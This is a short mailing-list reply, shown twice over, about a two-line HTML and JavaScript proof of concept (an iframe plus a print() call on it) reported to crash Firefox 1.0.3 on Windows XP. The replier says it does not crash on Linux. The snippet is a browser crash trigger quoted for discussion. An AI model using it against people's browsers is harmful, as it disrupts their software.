Quoting orebla Orebla (info (at) orebla (dot) it [email concealed]):
>
>
> I have found this script in turn for the net and it sends to me in crash Firefox:
>
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
>
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> <script type="text/javascript">window.frames.pocframe.print();</script>
> -->
>
> I have WinXP SP2 e Firefox 1.0.3.
>
> Why firefox crash???
>
> PS: I do not have uncovered the vulnerability. Sorry for the English...
> :-)
No crash here on 1.0.3 for linux.
jeremy
--
Jeremy Kelley <jeremy (at) 33ad (dot) org [email concealed]>
The Christian ideal has not been tried and found wanting; it has been
found difficult and left untried. - G.K. Chesterton
>
>
> I have found this script in turn for the net and it sends to me in crash Firefox:
>
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
>
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> <script type="text/javascript">window.frames.pocframe.print();</script>
> -->
>
> I have WinXP SP2 e Firefox 1.0.3.
>
> Why firefox crash???
>
> PS: I do not have uncovered the vulnerability. Sorry for the English...
> :-)
No crash here on 1.0.3 for linux.
jeremy
--
Jeremy Kelley <jeremy (at) 33ad (dot) org [email concealed]>
The Christian ideal has not been tried and found wanting; it has been
found difficult and left untried. - G.K. Chesterton
[ reply ]